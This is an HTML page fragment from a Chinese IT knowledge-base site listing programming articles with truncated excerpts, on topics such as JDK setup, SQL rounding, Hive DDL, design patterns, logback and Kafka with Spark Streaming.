<li><a href="/article/1934.htm" title="jdk环境变量配置" target="_blank">jdk环境变量配置</a> <span class="text-muted">byalias</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a> <div>进行java开发，首先要安装jdk，安装了jdk后还要进行环境变量配置： 1、下载jdk（http://java.sun.com/javase/downloads/index.jsp），我下载的版本是：jdk-7u79-windows-x64.exe 2、安装jdk-7u79-windows-x64.exe 3、配置环境变量：右击"计算机"-->&quo</div> </li> <li><a href="/article/2061.htm" title="《代码大全》表驱动法-Table Driven Approach-2" target="_blank">《代码大全》表驱动法-Table Driven Approach-2</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>package com.ljn.base; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.util.ArrayList; import java.util.Collections; import java.uti</div> </li> <li><a href="/article/2188.htm" title="SQL 数值四舍五入 小数点后保留2位" target="_blank">SQL 数值四舍五入 小数点后保留2位</a> <span class="text-muted">chicony</span> <a class="tag" taget="_blank" href="/search/%E5%9B%9B%E8%88%8D%E4%BA%94%E5%85%A5/1.htm">四舍五入</a> <div> 1.round() 函数是四舍五入用，第一个参数是我们要被操作的数据，第二个参数是设置我们四舍五入之后小数点后显示几位。 2.numeric 函数的2个参数，第一个表示数据长度，第二个参数表示小数点后位数。 例如： 　　select   cast(round(12.5,2)   as   numeric(5,2))  </div> </li> <li><a href="/article/2315.htm" title="c++运算符重载" target="_blank">c++运算符重载</a> <span class="text-muted">CrazyMizzz</span> <a class="tag" taget="_blank" href="/search/C%2B%2B/1.htm">C++</a> <div>一、加+，减-，乘*，除/ 的运算符重载 Rational operator*(const Rational &x) const{ return Rational(x.a * this->a); } 在这里只写乘法的，加减除的写法类似 二、<<输出,>>输入的运算符重载      &nb</div> </li> <li><a href="/article/2442.htm" title="hive DDL语法汇总" target="_blank">hive DDL语法汇总</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/hive/1.htm">hive</a><a class="tag" taget="_blank" href="/search/%E4%BF%AE%E6%94%B9%E5%88%97/1.htm">修改列</a><a class="tag" taget="_blank" href="/search/DDL/1.htm">DDL</a><a class="tag" taget="_blank" href="/search/%E4%BF%AE%E6%94%B9%E8%A1%A8/1.htm">修改表</a> <div>hive DDL语法汇总 １、对表重命名 hive> ALTER TABLE table_name RENAME TO new_table_name;   2、修改表备注 hive> ALTER TABLE table_name SET TBLPROPERTIES ('comment' = new_comm</div> </li> <li><a href="/article/2569.htm" title="jbox使用说明" target="_blank">jbox使用说明</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a> <div>参考网址：http://www.kudystudio.com/jbox/jbox-demo.html jBox v2.3 beta [ 点击下载]  技术交流QQGroup：172543951 100521167 [2011-11-11] jBox v2.3 正式版 - [调整&修复] IE6下有iframe或页面有active、applet控件</div> </li> <li><a href="/article/2696.htm" title="UISegmentedControl 开发笔记" target="_blank">UISegmentedControl 开发笔记</a> <span class="text-muted">dcj3sjt126com</span> <div>  //    typedef NS_ENUM(NSInteger, UISegmentedControlStyle) {     //        UISegmentedControlStylePlain,     // large plain   &</div> </li> <li><a href="/article/2823.htm" title="Slick生成表映射文件" target="_blank">Slick生成表映射文件</a> <span class="text-muted">ekian</span> <a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a> <div>Scala添加SLICK进行数据库操作，需在sbt文件上添加slick-codegen包 "com.typesafe.slick" %% "slick-codegen" % slickVersion 因为我是连接SQL Server数据库，还需添加slick-extensions，jtds包 "com.typesa</div> </li> <li><a href="/article/2950.htm" title="ES-TEST" target="_blank">ES-TEST</a> <span class="text-muted">gengzg</span> <a class="tag" taget="_blank" href="/search/test/1.htm">test</a> <div>package com.MarkNum; import java.io.IOException; import java.util.Date; import java.util.HashMap; import java.util.Map; import javax.servlet.ServletException; import javax.servlet.annotation</div> </li> <li><a href="/article/3077.htm" title="为何外键不再推荐使用" target="_blank">为何外键不再推荐使用</a> <span class="text-muted">hugh.wang</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/DB/1.htm">DB</a> <div>表的关联，是一种逻辑关系，并不需要进行物理上的“硬关联”，而且你所期望的关联，其实只是其数据上存在一定的联系而已，而这种联系实际上是在设计之初就定义好的固有逻辑。 在业务代码中实现的时候，只要按照设计之初的这种固有关联逻辑来处理数据即可，并不需要在数据库层面进行“硬关联”，因为在数据库层面通过使用外键的方式进行“硬关联”，会带来很多额外的资源消耗来进行一致性和完整性校验，即使很多时候我们并不</div> </li> <li><a href="/article/3204.htm" title="领域驱动设计" target="_blank">领域驱动设计</a> <span class="text-muted">julyflame</span> <a class="tag" taget="_blank" href="/search/VO/1.htm">VO</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/DTO/1.htm">DTO</a><a class="tag" taget="_blank" href="/search/po/1.htm">po</a> <div>概念： VO（View Object）：视图对象，用于展示层，它的作用是把某个指定页面（或组件）的所有数据封装起来。 DTO（Data Transfer Object）：数据传输对象，这个概念来源于J2EE的设计模式，原来的目的是为了EJB的分布式应用提供粗粒度的数据实体，以减少分布式调用的次数，从而提高分布式调用的性能和降低网络负载，但在这里，我泛指用于展示层与服务层之间的数据传输对</div> </li> <li><a href="/article/3331.htm" title="单例设计模式" target="_blank">单例设计模式</a> <span class="text-muted">hm4123660</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Singleton/1.htm">Singleton</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">单例设计模式</a><a class="tag" taget="_blank" href="/search/%E6%87%92%E6%B1%89%E5%BC%8F/1.htm">懒汉式</a><a class="tag" taget="_blank" href="/search/%E9%A5%BF%E6%B1%89%E5%BC%8F/1.htm">饿汉式</a> <div>       单例模式是一种常用的软件设计模式。在它的核心结构中只包含一个被称为单例类的特殊类。通过单例模式可以保证系统中一个类只有一个实例而且该实例易于外界访问，从而方便对实例个数的控制并节约系统源。如果希望在系统中某个类的对象只能存在一个，单例模式是最好的解决方案。      &nb</div> </li> <li><a href="/article/3458.htm" title="logback" target="_blank">logback</a> <span class="text-muted">zhb8015</span> <a class="tag" taget="_blank" href="/search/log/1.htm">log</a><a class="tag" taget="_blank" href="/search/logback/1.htm">logback</a> <div>一、logback的介绍      Logback是由log4j创始人设计的又一个开源日志组件。logback当前分成三个模块：logback-core,logback- classic和logback-access。logback-core是其它两个模块的基础模块。logback-classic是log4j的一个 改良版本。此外logback-class</div> </li> <li><a href="/article/3585.htm" title="整合Kafka到Spark Streaming——代码示例和挑战" target="_blank">整合Kafka到Spark Streaming——代码示例和挑战</a> <span class="text-muted">Stark_Summer</span> <a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a><a class="tag" taget="_blank" href="/search/storm/1.htm">storm</a><a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a><a class="tag" taget="_blank" href="/search/PARALLELISM/1.htm">PARALLELISM</a><a class="tag" taget="_blank" href="/search/processing/1.htm">processing</a> <div>作者Michael G. Noll是瑞士的一位工程师和研究员，效力于Verisign，是Verisign实验室的大规模数据分析基础设施（基础Hadoop）的技术主管。本文，Michael详细的演示了如何将Kafka整合到Spark Streaming中。 期间， Michael还提到了将Kafka整合到 Spark Streaming中的一些现状，非常值得阅读，虽然有一些信息在Spark 1.2版</div> </li> <li><a href="/article/3712.htm" title="spring-master-slave-commondao" target="_blank">spring-master-slave-commondao</a> <span class="text-muted">王新春</span> <a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/dataSource/1.htm">dataSource</a><a class="tag" taget="_blank" href="/search/slave/1.htm">slave</a><a class="tag" taget="_blank" href="/search/master/1.htm">master</a> <div>互联网的web项目，都有个特点：请求的并发量高，其中请求最耗时的db操作，又是系统优化的重中之重。 为此，往往搭建 db的 一主多从库的 数据库架构。作为web的DAO层，要保证针对主库进行写操作，对多个从库进行读操作。当然在一些请求中，为了避免主从复制的延迟导致的数据不一致性，部分的读操作也要到主库上。（这种需求一般通过业务垂直分开，比如下单业务的代码所部署的机器，读去应该也要从主库读取数</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类：</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>